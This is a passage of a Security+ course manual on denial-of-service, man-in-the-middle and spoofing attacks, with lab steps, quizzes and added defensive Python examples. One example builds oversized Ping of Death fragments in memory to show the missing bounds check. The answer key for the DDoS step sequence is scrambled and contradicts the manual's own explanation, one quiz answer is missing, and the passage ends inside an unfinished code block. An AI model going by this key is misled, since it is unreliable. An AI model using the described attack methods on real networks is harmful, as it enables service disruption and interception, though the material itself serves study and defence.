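In the unprotected run the queue of eight fills at t=0 and the legitimate client is rejected; with a 0.5-second time-out the spoofed entries have expired by the time the client arrives; with the proxying firewall the queue never fills at all, because every spoofed entry is moved out immediately and reset afterwards.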


                  SynAttackProtect
                  You can protect your server from SYN floods with the TCP/IP registry parameter
                  SynAttackProtect. This parameter enables SYN flood attack protection. A value of 1
                  enables the protection if the TcpMaxConnectResponseRetransmissions value is at least 2.
                  This protection detects SYN flooding and then reduces the time spent on server
                  connection requests that can't be acknowledged. This entry can be added to Windows
                  Server 2003 through Regedit.

Do it!   A-1:   Protecting against SYN flood attacks
          Here’s how                       Here’s why
          1 Log on to the Windows Server   Setting the SynAttackProtect parameter in the
            2003 server as Administrator   Windows registry makes a Windows NT, 2000
                                           or Server 2003 network more resistant to SYN
                                           flood attacks.

          2 Click Start

          3 Choose Run…

            Enter regedit

            Click OK                       To open the Registry Editor window.

          4 Expand
            HKEY_LOCAL_MACHINE

          5 Expand SYSTEM

          6 Expand CurrentControlSet




          7 Expand Services

          8 Expand Tcpip

          9 Select Parameters

         10 Right-click Parameters

         11 Choose New, DWORD Value




            Enter SynAttackProtect


                  12 Right-click SynAttackProtect       To start the process of changing the parameter
                                                        value.

                       Choose Modify

                  13 In the Value Data field, enter 1   A value of 1 enables the parameter.

                       Click OK

                  14 Close the Registry Editor window

              Smurf
Explanation   Smurf is a non-OS specific attack that uses a third-party’s network segment to
              overwhelm a host with a flood of Internet Control Message Protocol (ICMP) packets.
              As shown in Exhibit 3-3, three parties are involved: the attacker, an intermediary
              network (preferably, with numerous hosts), and the victim (typically, a computer or
              router on the Internet).
                  1 The hacker sends a ping (echo-request) packet to the intermediary network’s
                      broadcast address. The packet’s source IP address is faked to be that of the
                      victim system.
                  2 The ping was sent to the broadcast address of the intermediary network, so every
                      host on that subnet replies to the victim’s IP address.
                  3 The third-party’s hosts unwittingly deluge the victim with ping packets.
              Using this technique, the hacker can not only overwhelm the computer system receiving
              the flood of echo packets, but can also saturate the victim’s Internet connection with
              bogus traffic and therefore delay or prevent legitimate traffic from reaching its
              destination.




              Exhibit 3-3: Smurf attack

              Countermeasures
              Protective measures against Smurf attacks can be placed in the network or on individual
              hosts.
                  • Configure routers to drop ICMP messages from outside the network with a
                      destination of an internal broadcast or multicast address.
                  • Configure hosts to ignore echo requests directed to their subnet broadcast
                      address.
              Most current router and desktop operating systems have protection in place to guard
              against well-known Smurf attacks by default, but changes to the configuration or new
              modifications of the attack might make the network and hosts vulnerable.

                           Ping of Death
                           There are a number of attacks that exploit some operating systems’ incorrect handling or
                           error checking of fragmented IP packets. The Ping of Death is a well-known exploit that
                           uses IP packet fragmentation techniques to crash remote systems. When first released,
                           this shockingly simple attack had the ability to crash any machine that could receive a
                            ping packet. All the attacker needed in order to carry out this attack was the victim’s IP address!

                            Mode of attack
                            This common exploit misuses the way that large IP packets (or more specifically, ICMP
                            packets, because the attack uses a ping) are transmitted across networks. The maximum
                            size of an IP packet is 65,535 bytes, but packets that large cannot be transmitted on
                            many network topologies. For example, the maximum transmission unit (MTU) for
                            Ethernet—probably the most commonly used LAN topology—is only 1500 bytes. To
                            transmit a large IP packet across a LAN, hosts and routers fragment IP packets into
                            smaller Ethernet frames, and then reassemble the fragments at the destination. Each
                            fragment contains an offset value that tells the receiving host where to insert its data into
                            the reassembled packet.
                            In the Ping of Death, a very large ICMP (ping) packet is crafted and transmitted to the
                            victim, fragment by fragment. With each fragment, the size of the reassembled ping
                            grows to near the 65,535-byte size limit of the IP packet. When the final fragment
                            arrives, its offset value forces the packet to grow beyond the IP size limit, causing the
                            victim host to crash.

Explain the nature of IP packets and the concept of the MTU. You can explain an MTU by using a floppy disk analogy. If you want to transfer 5MB of information from one computer to the other using a floppy disk, you will have to split the information up into chunks small enough for the floppy to handle and then reassemble the data on the other computer.

                           Countermeasures
                           What made this attack particularly problematic was that recent Windows operating
                           systems allowed the generation of nonstandard pings from the regular user command
                           line, but the same systems would die when presented with one of these packets. Most
                           manufacturers have now provided patches that make their systems invulnerable to the
                           Ping of Death and other types of IP fragmentation attacks.
                           Starting with Windows 2000, Microsoft has removed the ability to generate ICMP
                           packets of invalid size by setting the maximum packet size to 53,000 bytes.
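To show where the missing check belongs, the following Python block is an added example written for this section, not code from the course manual or from any operating system: it reassembles IP fragments given as (offset, more-fragments, payload) tuples and rejects any fragment whose end would pass the 65,535-byte limit. The fragment lists are constructed; the 1480-byte payload is the 1500-byte Ethernet MTU minus a 20-byte IP header. With the check switched off it reproduces the condition that crashed unpatched stacks: a reassembled datagram larger than the IP maximum.

```python
"""Fragment reassembly with the bounds check that the Ping of Death relies
on being absent.  Added example for this section, not code from the course
manual; the fragment lists are constructed."""
IP_MAX_LEN = 65535          # largest IP datagram (16-bit total length field)
ETHERNET_MTU = 1500
IP_HEADER_LEN = 20
FRAG_PAYLOAD = ETHERNET_MTU - IP_HEADER_LEN   # 1480 data bytes per fragment


def reassemble(fragments, enforce_limit=True):
    """fragments: iterable of (offset_units, more_fragments, payload), where
    offset_units is the IP fragment-offset field (8-byte units).  Returns the
    reassembled datagram.  With enforce_limit=False the buffer is allowed to
    grow past IP_MAX_LEN, which is the condition the vulnerable stacks never
    checked before writing into a fixed-size reassembly buffer."""
    buf = bytearray()
    for offset_units, more_fragments, payload in fragments:
        start = offset_units * 8
        end = start + len(payload)
        if enforce_limit and end > IP_MAX_LEN:
            raise ValueError(f"fragment at offset {start} ends at byte {end}, "
                             f"past the {IP_MAX_LEN}-byte IP maximum")
        if end > len(buf):
            buf.extend(bytes(end - len(buf)))   # grow to fit, zero-filled gap
        buf[start:end] = payload
    return bytes(buf)


def accepts(fragments):
    """True if a checked reassembler accepts the whole datagram."""
    try:
        reassemble(fragments)
        return True
    except ValueError:
        return False


def normal_ping_fragments(total=3000, payload_len=FRAG_PAYLOAD):
    """A legitimate oversized ping, split across MTU-sized fragments."""
    frags, offset_units, remaining = [], 0, total
    while remaining > 0:
        n = min(payload_len, remaining)
        remaining -= n
        frags.append((offset_units, remaining > 0, b"A" * n))
        offset_units += n // 8
    return frags


def ping_of_death_fragments(payload_len=FRAG_PAYLOAD):
    """Fragments that fill the datagram to just under 65,535 bytes, followed
    by a final fragment whose offset pushes the total past the limit."""
    frags, offset_units = [], 0
    while offset_units * 8 + payload_len <= IP_MAX_LEN:
        frags.append((offset_units, True, b"A" * payload_len))
        offset_units += payload_len // 8
    frags.append((offset_units, False, b"B" * payload_len))   # oversteps the limit
    return frags


if __name__ == "__main__":
    print("normal ping reassembles to", len(reassemble(normal_ping_fragments())), "bytes")
    pod = ping_of_death_fragments()
    print("unchecked reassembly of the Ping of Death:",
          len(reassemble(pod, enforce_limit=False)), "bytes")
    print("checked reassembler accepts it:", accepts(pod))
```

The last fragment of the constructed Ping of Death starts at byte 65,120 and ends at 66,600; a checked reassembler refuses it before touching the buffer, which is the behaviour the vendor patches introduced.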

Do it!   A-2:   Discussing DoS attacks
          Questions and answers
          1 A SYN flood exploits the nature of the TCP three-way handshake. True or false?

            True

          2 The SYN attack inhibits services by which of the following?
            A      Flooding a host with ICMP messages
            B      Transmitting excessively large IP packets
            C      Filling the half-open connection queue with bogus connections
            D      Overwhelming a DNS server with lookup requests

          3 What are some ways to defend against Smurf attacks?
            • Set filters on firewalls and routers to drop ICMP messages.
            • Configure hosts to ignore echo requests directed to their subnet broadcast address.

          4 How can you defend against Ping of Death attacks?
            • Limit ICMP packet size.
            • Install the latest security patches on your clients and servers.

                     Distributed Denial-of-Service attacks
Explanation          A distributed denial-of-service (DDoS) attack is a network attack where the attacker
                     manipulates multiple hosts to carry out a DoS attack on a target. It usually results in the
                     temporary loss of access to a given site and an associated loss in revenue and prestige
                     for the victim.
                     The tools are automated, so a script kiddie (a malicious person on the Internet who is
                     able to use automated attack tools but has limited technical understanding of how they
                     work) can execute DDoS attacks. They are easy to launch, are extremely effective, and
                     have become the tool of choice for malicious hackers targeting government and
                     business Internet sites.

                     Setting up DDoS attacks
                     As shown in Exhibit 3-4, the first step in setting up a DDoS assault is for the attacker to
                     compromise a machine to be used as a handler.




                     Exhibit 3-4: Distributed denial-of-service attack

                     This is typically a large machine with plenty of disk space and a fast Internet
                     connection, so the malicious hacker has the resources necessary to upload an exploit
                     toolkit. It’s important that the hacker go undetected on the handler machine, so hosts
                     with a large number of user accounts or inattentive system administrators are targets for
                     use as handlers.
                      Once the handler has been set up with the necessary software tools, it begins to use
                     automated scripts to scan large chunks of ISP address space (DSL and cable customers
                     making the best targets because of their bandwidth and constant connection) to find
                     hosts to use as agents, or zombies. The scripts used for this purpose generally target
                     specific, known vulnerabilities in Windows operating systems and can complete the task
                     of compromising each system and uploading the zombie software within a matter of
                     seconds. The software is transparent to the machine’s owner, as it is imperative to the
                     attacker that their tools go undetected.

                             Hundreds or thousands of zombies might be required to launch a successful DDoS
                             attack, because most major Web sites have sufficient bandwidth and server resources to
                             handle substantial amounts of network traffic. This is not an obstacle for the determined
                              script kiddie, as the ever-increasing number of unprotected home PCs connected to the
                             Internet provides ample fodder for creating a large army of zombies.

                             Conducting DDoS attacks
                             The agent software on compromised hosts usually communicates with the handler
                             machine via Internet Relay Chat (IRC) connections. These hosts are automatically
                             logged on to an IRC channel where they passively wait for attack orders from the
                             handler machines. When the malicious hacker is ready to launch the attack, a command
                             is issued through the handler machine to the thousands of agents connected to the
                             channel.
                             Depending on the type of agent software installed, the attacker has a number of attack
                             types to choose from, as listed in the following table:

                               Tools                        Flooding or attack methods

                               Trin00                       UDP
                               Tribe flood network          UDP, ICMP, SYN, Smurf
                               Stacheldraht and variants    UDP, ICMP, SYN, Smurf
                               TFN 2K                       UDP, ICMP, SYN, Smurf
                               Shaft                        UDP, ICMP, SYN combo
                               Mstream                      Stream (ACK)
                               Trinity, Trinity v3          UDP, SYN, RST, Random Flag, ACK, Fragment

If students are unfamiliar with UDP, explain that it is a connectionless protocol often used for network broadcast messages.

More information about Trinity can be found at www.ciac.org/ciac/bulletins/k-072.shtml.


                             When the attacker is ready to launch the attack, the zombies are remotely instructed to
                             flood the victim network—which they do without the machines’ owners ever being
                             aware that their computer has been compromised.
                             For an account of a DDoS attack, and the hacker’s methods and objectives, see Steve
                             Gibson’s account at http://grc.com/dos/grcdos.htm.

                            DDoS countermeasures
                            The following table outlines actions you can take to safeguard your network against
                            DDoS attacks.

                             Equipment               Action

                             Clients and servers     Install the latest security patches from your software vendors.

                                                     Install and configure personal firewalls on desktop PCs.

                                                     Install antivirus software and maintain up-to-date signatures.

                                                     Perform regular hard disk scans with the antivirus software.

                             E-mail servers          Install antivirus software on all mail servers, both internal and external, to protect
                                                     the network from e-mail worms.

                              Firewalls and routers   Filter packets coming into the network destined for a broadcast address. This can
                                                      help to prevent your network from being susceptible to the Smurf attack.

                                                      Turn off directed broadcasts on all internal routers. This also internally prevents a
                                                      Smurf attack.

                                                      Block any packet from entering your network that has a source address that is not
                                                      permissible on the Internet. This type of address would include RFC 1918 address
                                                      space (10.0.0.0, 172.16.0.0, and 192.168.0.0), multicast address space
                                                      (224.0.0.0), and loopback addresses (127.0.0.0).

                                                      Block any packet that uses a protocol or port that is not used for Internet
                                                      communications in your network.

                                                      Block packets with a source address originating inside your network from
                                                      entering your network.

                                                      Block packets with fake source addresses from leaving your network.

Inform students that a detailed discussion of firewalls will be offered later in the course.
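The firewall and router rows of this table, together with the Smurf countermeasures given earlier (drop outside packets aimed at the broadcast address), can be expressed as one packet-filter decision. The Python block below is an added example, not course material and not any vendor’s configuration; the site address block 203.0.113.0/24, the list of exposed services and the sample packets are assumptions. Turning off directed broadcasts is a router setting and is not modeled.

```python
"""Ingress/egress packet filter implementing the "Firewalls and routers"
countermeasures: drop inbound packets to broadcast/multicast destinations,
drop unroutable and internal source addresses arriving from outside, drop
unneeded protocols, and drop spoofed sources on the way out.  Added example,
not course material; the site's address block, the allowed services and the
sample packets are assumptions."""
import ipaddress

# Assumption: this site owns the documentation block 203.0.113.0/24.
INTERNAL = ipaddress.ip_network("203.0.113.0/24")

# Source ranges that must never appear on a packet arriving from the Internet.
BOGON_SOURCES = [
    ipaddress.ip_network("10.0.0.0/8"),      # RFC 1918 private
    ipaddress.ip_network("172.16.0.0/12"),   # RFC 1918 private
    ipaddress.ip_network("192.168.0.0/16"),  # RFC 1918 private
    ipaddress.ip_network("224.0.0.0/4"),     # multicast is never a valid source
    ipaddress.ip_network("127.0.0.0/8"),     # loopback
]

# Assumption: the only services this site exposes to the Internet.
ALLOWED_INBOUND = {"tcp/25", "tcp/80", "tcp/443"}


def filter_packet(src, dst, direction, service):
    """Decide one packet.  direction is "in" (arriving from the Internet) or
    "out" (leaving the site); service is "proto/port" such as "tcp/80", or
    "icmp".  Returns (action, reason)."""
    s, d = ipaddress.ip_address(src), ipaddress.ip_address(dst)
    if direction == "in":
        # Smurf: an outside ping aimed at our broadcast (or a multicast)
        # address would be answered by every host on the segment.
        if d == INTERNAL.broadcast_address or d.is_multicast:
            return "drop", f"inbound packet to broadcast/multicast {d}"
        for net in BOGON_SOURCES:
            if s in net:
                return "drop", f"source {s} is not routable on the Internet ({net})"
        # Anti-spoofing: nothing arriving from outside should claim to be us.
        if s in INTERNAL:
            return "drop", f"inbound packet with internal source {s}"
        if service not in ALLOWED_INBOUND:
            return "drop", f"{service} is not an Internet service of this site"
        return "allow", ""
    if direction == "out":
        # Egress filtering: keep our hosts (zombies included) from sending
        # packets with forged sources into someone else's network.
        if s not in INTERNAL:
            return "drop", f"outbound packet with spoofed source {s}"
        return "allow", ""
    raise ValueError(f"unknown direction {direction!r}")


# Constructed sample traffic: (src, dst, direction, service, description).
SAMPLE_PACKETS = [
    ("198.51.100.9", "203.0.113.255", "in", "icmp", "Smurf trigger to our broadcast"),
    ("10.4.4.4", "203.0.113.10", "in", "tcp/80", "RFC 1918 source from outside"),
    ("203.0.113.5", "203.0.113.10", "in", "tcp/80", "our own address from outside"),
    ("198.51.100.9", "203.0.113.10", "in", "udp/19", "chargen, not a service we offer"),
    ("198.51.100.9", "203.0.113.10", "in", "tcp/443", "ordinary HTTPS request"),
    ("192.0.2.77", "198.51.100.9", "out", "tcp/80", "spoofed source leaving the site"),
    ("203.0.113.10", "198.51.100.9", "out", "tcp/443", "ordinary outbound traffic"),
]


def audit(packets=SAMPLE_PACKETS):
    """Run the filter over the samples; returns a list of (description, action)."""
    return [(desc, filter_packet(s, d, dirn, svc)[0]) for s, d, dirn, svc, desc in packets]


if __name__ == "__main__":
    for s, d, dirn, svc, desc in SAMPLE_PACKETS:
        action, reason = filter_packet(s, d, dirn, svc)
        print(f"{action:5} {dirn:3} {s:>14} -> {d:<14} {svc:8} {desc}; {reason}")
```

The order of the checks matters little for correctness but does for the reason reported; the broadcast test comes first because a Smurf trigger is dropped regardless of where it claims to come from.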

Do it!                      A-3:   Scanning for zombies
See the classroom setup instructions for the location of the download file.

                              Here’s how                            Here’s why
                              1 Download the DDoSPing               DDoSPing is a detection utility that scans for
                                software according to your          the most common DDoS programs. This tool
                                Instructor’s directions             will detect Trin00, Stacheldraht, and Tribe
                                                                    Flood Network programs running with their
                                                                    default settings.

                                                                    A download link for this software is provided at
                                                                    http://www.foundstone.com/knowledge/proddesc/ddosping.html.

                             2 Extract the program into
                               C:\Security

                             3 In Windows Explorer, go to          The DDoSPing window appears.
                               C:\Security and double-click
                               ddosping.exe

                             4 Under Transmission speed
                               control, move the slide bar to
                               max


Limit the range of IP addresses to classroom PCs.

                              5 Under Target IP address range,     This type of scan is often detected by a network
                                enter the range specified by your  administrator and might violate computer use
                                Instructor                         policies if done without permission.

                             6 Click Start                         The scan will take a few seconds to complete.
                                                                   Wait until the “Program stopped” message
                                                                   appears.

                             7 Review the Infected Hosts and       To determine whether the system is infected. If
                               Status sections                     no names appear in the Infected Hosts section
                                                                   and in the Status section, Zombies detected is 0,
                                                                   your system is clean.

                              8 Close the DDoSPing window

Do it!              A-4:      Discussing DDoS attacks
                      Questions and answers
                       1 Which of the following are DDoS tools?
                          A    Trin00
                          B    Trinity
                          C    Mstream
                          D    All of the above

                       2 List three countermeasures you can implement to protect clients and servers from
                         DDoS attacks.

                          Answers might include:
                          • Install the latest security patches
                          • Install and configure personal firewalls on desktop PCs
                          • Install antivirus software and maintain up-to-date signatures
                          • Perform regular hard disk scans with the antivirus software

                       3 Number the steps to launch a DDoS attack in the proper sequence.

                          ___ Zombies log onto IRC channel to communicate with the handler        3

                          ___ Zombies flood the victim network                                    5

                          ___ Attacker compromises machine to be used as a handler                4

                          ___ Handler uploads the zombie software                                 1

                          ___ Handler scans for hosts to use as agents or zombies                 6

                          ___ Handler launches attack                                             2


Topic B: Man-in-the-middle attacks
              This topic covers the following CompTIA Security+ exam objectives:

               #     Objective

               1.3   Identify non-essential services and protocols and know what actions to take to reduce the risks of
                     those services and protocols

               1.4   Recognize the following attacks and specify the appropriate actions to take to mitigate
                     vulnerability and risk
                      • Man in the Middle




              The purpose of man-in-the-middle attacks
Explanation   Man-in-the-middle refers to a class of attacks in which the attacker places himself
              between two communicating hosts and listens in on their session. The key to this
              concept is that both hosts think they are communicating with the other, when they are in
              fact communicating with the attacker, as shown in Exhibit 3-5.




              Exhibit 3-5: Man-in-the-middle attacks


                  Man-in-the-middle attacks have a variety of applications, including:
                      • Web spoofing — This is an attack in which the assailant arranges his Web server
                        between his victim’s Web browser and a legitimate server. In this case, the
                        attacker can monitor and record the victim’s online activity, as well as modify
                        the content being viewed by the victim.
                      • TCP session hijacking — By arranging for traffic between two hosts to pass
                         through his machine, an attacker can actually take over the role of one of them
                        and assume full control of the TCP session. For example, by monitoring a
                        victim’s communications with an FTP server, the attacker can wait for the
                        victim to authenticate and then hijack the TCP session and take over the user’s
                        access to the FTP server.
                      • Information theft — The attacker can passively record data communications in
                        order to gather sensitive information that might be passing between two hosts.
                        This information could include anything from industrial secrets to username and
                        password information.
                      • Many other attacks, including denial-of-service attacks, corruption of
                        transmitted data, or traffic analysis to gain information about the victim’s
                        network.

                   Conducting man-in-the-middle attacks
                  Man-in-the-middle attacks can be accomplished using a variety of methods; in fact, any
                  person who has access to network packets as they travel between two hosts can
                  accomplish these attacks:
                      • ARP poisoning — Using Hunt, a freely available tool that uses ARP poisoning,
                         an attacker can monitor and then hijack a TCP session. This requires that the
                         attacker be on the same Ethernet segment as either the victim or the host with
                         which it is communicating.
                      • ICMP redirects — Using ICMP redirect packets, an attacker could instruct a
                         router to forward packets destined for the victim through the attacker’s own
                         machine. The attacker can then monitor or modify the packets before they are
                         sent to their destination.
                      • DNS poisoning — An attacker redirects victim traffic by compromising the
                         victim’s DNS cache with incorrect hostname-to-IP address mappings.

                  Countermeasures
                  To protect against man-in-the-middle attacks, routers should be configured to ignore
                  ICMP redirect packets. Countermeasures for ARP and DNS poisoning will be examined
                  in the following discussion of spoofing techniques.
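Although the countermeasures for ARP and DNS poisoning are left to the next topic, ARP poisoning leaves a signature a defender can watch for on the segment: one IP address answered by two different MACs, or one MAC answering for several IP addresses at once. The Python block below is an added detection example for this topic, not code from the course manual; the ARP reply records, MAC and IP addresses are constructed.

```python
"""Passive ARP-poisoning detector for one Ethernet segment.  Added example
for this topic, not code from the course manual; the ARP reply records and
MAC/IP addresses below are constructed."""
from collections import defaultdict

# Constructed ARP replies as a sniffer on the segment would record them:
# (seconds, sender IP, sender MAC).  00:11:22:33:44:01 is assumed to be the
# real gateway; from t=30 a second MAC starts answering for the gateway and
# then for a client too, which is how a session is put "in the middle".
ARP_REPLIES = [
    (0,  "192.168.1.1",  "00:11:22:33:44:01"),
    (5,  "192.168.1.20", "00:11:22:33:44:20"),
    (10, "192.168.1.1",  "00:11:22:33:44:01"),
    (30, "192.168.1.1",  "aa:bb:cc:dd:ee:ff"),
    (31, "192.168.1.20", "aa:bb:cc:dd:ee:ff"),
    (40, "192.168.1.1",  "00:11:22:33:44:01"),
]


def detect_arp_poisoning(replies, static_table=None):
    """Return alert strings for two signatures of ARP poisoning:
    1. an IP address answered by a MAC other than the one first seen (or
       other than a pinned static entry), and
    2. one MAC answering for more than one IP address, the fingerprint of a
       host impersonating both ends of a session."""
    alerts = []
    mac_for_ip = dict(static_table or {})   # trusted bindings, learned or pinned
    ips_for_mac = defaultdict(set)
    for t, ip, mac in replies:
        known = mac_for_ip.get(ip)
        if known is None:
            mac_for_ip[ip] = mac            # first sighting: learn it
        elif known != mac:
            alerts.append(f"t={t}: {ip} answered by {mac}, expected {known}")
        ips_for_mac[mac].add(ip)
        if len(ips_for_mac[mac]) > 1:
            alerts.append(f"t={t}: {mac} answers for {sorted(ips_for_mac[mac])}")
    return alerts


if __name__ == "__main__":
    for line in detect_arp_poisoning(ARP_REPLIES):
        print(line)
```

Pinning the gateway in the static table (the second argument) removes the dependence on the first sighting being the honest one; on a real segment the same logic runs over captured ARP replies rather than the constructed list.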

Do it!   B-1:   Reviewing man-in-the-middle attacks
          Questions and answers
          1 Define man-in-the-middle attacks.

            This is a class of attacks in which the attacker places himself between two communicating
            hosts and listens in on their session.

          2 TCP session hijacking is an attack in which the assailant arranges his Web server
            between his victim’s Web browser and a legitimate server. True or false?

            False: Web spoofing does this

          3 State three goals for man-in-the-middle attacks.

            Answers might include:
            • Monitor and record a victim’s online activity
            • Modify information presented to a user
            • Hijack a session
            • Gather confidential information


Topic C: Spoofing
                     This topic covers the following CompTIA Security+ exam objectives:

                      #       Objective

                      1.3     Identify non-essential services and protocols and know what actions to take to reduce the risks of
                              those services and protocols

                      1.4     Recognize the following attacks and specify the appropriate actions to take to mitigate
                              vulnerability and risk
                               • Spoofing




                     Spoofing types
Explanation          Spoofing is pretending to be someone else by imitating or impersonating that person.
                     When you present credentials (for example, a username/password, hostname, or IP
                     address) that are not yours in order to gain access to a network, then you are spoofing
                     that system. This is much like presenting a fake driver’s license to illegally buy alcohol
                     or presenting fake credentials to appear as a law enforcement official. Four primary
                     types of spoofing are issues for the information security professional:
                          • IP address spoofing
                          • ARP poisoning
                          • Web spoofing
                          • DNS spoofing

                     IP address spoofing
                     IP address spoofing gains access to a victim by generating TCP/IP packets with the
                     source address of a trusted host. The attacker uses this deception to bypass filters on
                     routers and firewalls and gain access to network resources.
                     The sequence of events for an attack that uses IP spoofing is described below and
                     pictured in Exhibit 3-6.
                         1 The attacker identifies a target, the victim of the attack, and a machine that is
                            trusted by the victim.
                            The attacker disables the trusted machine’s ability to communicate by flooding it
                            with SYN packets.
                         2 The attacker uses some mechanism to determine the sequence numbers to be
                            used by the victim. This could involve sampling packets between the victim and
                            trusted hosts.
                            The attacker spoofs the source IP address of the trusted host in order to send his
                            or her own packets to the victim.
                         3 The victim accepts the spoofed packet and responds. Although the network
                            infrastructure automatically routes the victim’s reply packets to the trusted host,
                            the trusted host is unable to process the packets because of the SYN flood attack
                            against it.
                         4 Blind to the victim’s response, the attacker must guess its contents and craft an
                            appropriate response, again using a spoofed source address and a guessed
                            sequence number.




Exhibit 3-6: Filtering spoofed packets


Challenges
There are three primary challenges faced by the attacker using IP address spoofing.
   1 Although the hacker can craft packets that can be routed via the Internet, past the
       firewall, to the victim, the perpetrator cannot cause the return packet to be
       delivered back to his or her machine. This is because the network automatically
       routes the reply packet to the trusted host. In such a case, the hacker is flying
       blind and cannot hear the victim host’s responses.
   2 The victim’s reply packets are automatically delivered to the trusted host by the
       network infrastructure. If the trusted host the hacker is spoofing responds to the
       packets that it is receiving from the victim, it could interfere with the scheme. To
       prevent this from happening, the hacker needs to DoS the trusted host to keep it
        from responding to the victim’s packets. This can be accomplished with a SYN
        flood.
   3 This hurdle is perhaps the most difficult to leap: in order for the victim host to
       accept the spoofed packets from the hacker, the packets must have the correct
       sequence number. The initial sequence number (ISN) is provided by the victim
       host as part of a session setup. Remember that the hacker cannot receive any
       packets back from the victim during the spoofed session. The hacker’s ability to
       craft packets with the correct sequence numbers (which are therefore accepted
       by the victim) is reliant upon the hacker’s ability to narrow the ISN down to an
       acceptable range, and to predict subsequent sequence numbers based on
       knowledge of the ISN and the victim’s algorithm for determining subsequent
       sequence numbers.

                               Countermeasures
                               To prevent IP spoofing, disable source routing on all internal routers. Also, filter out
                               packets entering the local network from the Internet that have a source address of the
                               local network.
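An added example, not from the manual, of the two countermeasures above applied as a border packet filter: it drops inbound packets that claim a local source address and any packet carrying a source-route option, and, going one step beyond the text, also drops outbound packets with a non-local source so this network cannot be used to spoof others. The 192.168.1.0/24 block and the sample packets are constructed.

```python
import ipaddress
from dataclasses import dataclass
from typing import List

# Constructed: the address block assigned to the local network behind this router.
LOCAL_NETS = [ipaddress.ip_network("192.168.1.0/24")]


@dataclass
class Packet:
    direction: str                # "inbound" (from the Internet) or "outbound" (leaving)
    src: str                      # source IP address in the header
    dst: str                      # destination IP address
    source_routed: bool = False   # IP loose/strict source-route option present


def is_local(addr: str) -> bool:
    """True if addr belongs to one of the local network's address blocks."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in LOCAL_NETS)


def filter_decision(pkt: Packet) -> str:
    """Apply the anti-spoofing rules to one packet and return the verdict."""
    # The text says to disable source routing: a source-routed packet lets the
    # sender dictate the path instead of leaving it to the network.
    if pkt.source_routed:
        return "drop: source-routed packet"
    # A packet arriving from the Internet can never legitimately carry one of
    # our own addresses; this is the trusted-host impersonation in the text.
    if pkt.direction == "inbound" and is_local(pkt.src):
        return "drop: local source address arriving from the Internet"
    # Egress filtering (beyond the text): our hosts may only send as themselves.
    if pkt.direction == "outbound" and not is_local(pkt.src):
        return "drop: non-local source address leaving the network"
    return "accept"


# Constructed sample traffic as seen at the border router.
SAMPLE_PACKETS: List[Packet] = [
    Packet("inbound", "203.0.113.5", "192.168.1.10"),     # ordinary Internet client
    Packet("inbound", "192.168.1.20", "192.168.1.10"),    # claims to be the trusted internal host
    Packet("inbound", "203.0.113.5", "192.168.1.10", source_routed=True),
    Packet("outbound", "192.168.1.10", "203.0.113.5"),    # internal host replying normally
    Packet("outbound", "198.51.100.7", "203.0.113.5"),    # internal host forging an outside address
]


def run_filter(packets: List[Packet] = SAMPLE_PACKETS) -> List[str]:
    """Return one verdict per packet, in order."""
    return [filter_decision(p) for p in packets]


if __name__ == "__main__":
    for pkt, verdict in zip(SAMPLE_PACKETS, run_filter()):
        print(f"{pkt.direction:8} {pkt.src:>15} -> {pkt.dst:<15} {verdict}")
```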

Do it!   C-1:   Scanning IP addresses
          Here’s how / Here’s why

          (Instructor note: See the classroom setup instructions for the location of the download file.)

          1 Download the Foundstone SuperScan software
            (Follow your Instructor’s directions.) Foundstone’s SuperScan is a powerful connect-based
            TCP port scanner, pinger, and hostname resolver. A download link for this software is
            provided at www.foundstone.com/knowledge/proddesc/superscan.html.

          2 Unpack the program into C:\Security

          3 In Windows Explorer, go to C:\Security and double-click SuperScan4.exe
            The SuperScan window appears.

          (Instructor note: Limit the range of IP addresses to classroom PCs. This type of scan is often
          detected by a network administrator and might violate computer use policies if done without
          permission.)

          4 Under IPs, enter the IP address range specified by your Instructor

          5 Click the right arrow key next to the IP address range
            To add the address range as the range to be scanned.

          6 Click the blue Start arrow
            To start the scan.

          7 Review the results

          8 Based on the results of the scan, which IP addresses are in use?
            Answers will vary. Notice that the IP address of the host performing the scan is not included
            in the list. This is because no ports are open on the host performing the scan and, by default,
            hosts without open ports aren’t listed.

          9 Which ports are open on those systems?
            This type of information is very useful to hackers.

         10 When you are done viewing the scan results, close the application window

              ARP poisoning
Explanation   ARP (Address Resolution Protocol) poisoning is a technique used to corrupt a host’s
              ARP table, allowing the hacker to redirect traffic to the attacking machine. The attack
              can only be carried out when the attacker is connected to the same local network as the
              target machines.

              Operation
              ARP operates by sending out ARP request packets. An ARP request broadcasts the
              question, “Whose IP address is x.x.x.x?” to all computers on the LAN, even on a
              switched network. Each computer examines the ARP request and checks if it is
              currently assigned the specified IP. The machine with the specified IP address returns an
              ARP reply containing its MAC address.
              To minimize the number of ARP packets being broadcast, operating systems keep a
              cache of ARP replies. When a computer receives an ARP reply, it will update its ARP
              cache with the new IP/MAC association.
              ARP cache poisoning occurs when an attacker sends forged ARP replies. In this case, a
              target computer could be convinced to send frames to the attacker’s PC instead of the
              trusted host. When done properly, the trusted host will have no idea this redirection took
              place.
              Attack tools used for ARP poisoning include ARPoison, Ettercap, and Parasite. These
              tools are able to spoof ARP packets to perform man-in-the-middle attacks, redirect
              transmission, or to simply intercept packets.

              Countermeasures
              To stop ARP poisoning, use network switches that have MAC binding features.
              Switches with MAC binding store the first MAC address that appears on a port and do
              not allow the mapping to be changed without authentication.

              Web spoofing
              A Web spoofing attack convinces its victims that they are visiting a real and legitimate
              site, when they are in fact visiting a Web page that has either been created or modified
              by the attacker for duping the victim. The attacker can then monitor or modify any data
              passing between the victim and the Web server.
              Web spoofing attacks come in two flavors:
                  • Man-in-the-middle attacks
                  • Denial of Service attacks

              Man-in-the-middle attacks
              In this form of Web spoofing, the attacker rewrites the URLs embedded in the Web pages to
              point to the attacker’s Web server rather than a legitimate server. This is accomplished using
              automated URL editing tools. Assuming the attacker’s server is on machine
              www.attacker.net, the attacker rewrites each URL to begin with
              http://www.attacker.net/. The link http://newspaper.com becomes
              http://www.attacker.net/http://newspaper.com.

                      When the victim clicks on the revised URLs, the browser requests a page from the attacker’s
                      server, which then requests the page from the real server. The attacker’s server revises the
                      page’s URLs before providing the edited version to the victim. Using this method, every
                      page on the World Wide Web can be altered to pass through the attacker’s server, as shown
                      in Exhibit 3-7.




                      Exhibit 3-7: Web spoofing
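An added example, not from the manual, that turns the "watch the location line" advice into a check: it collects the links on a fetched page and flags any that route through a different host while carrying a complete URL in their path, which is the signature of the rewriting described above. The HTML sample and the newspaper.com host are constructed.

```python
from html.parser import HTMLParser
from typing import List, Optional, Tuple
from urllib.parse import urlsplit


class LinkCollector(HTMLParser):
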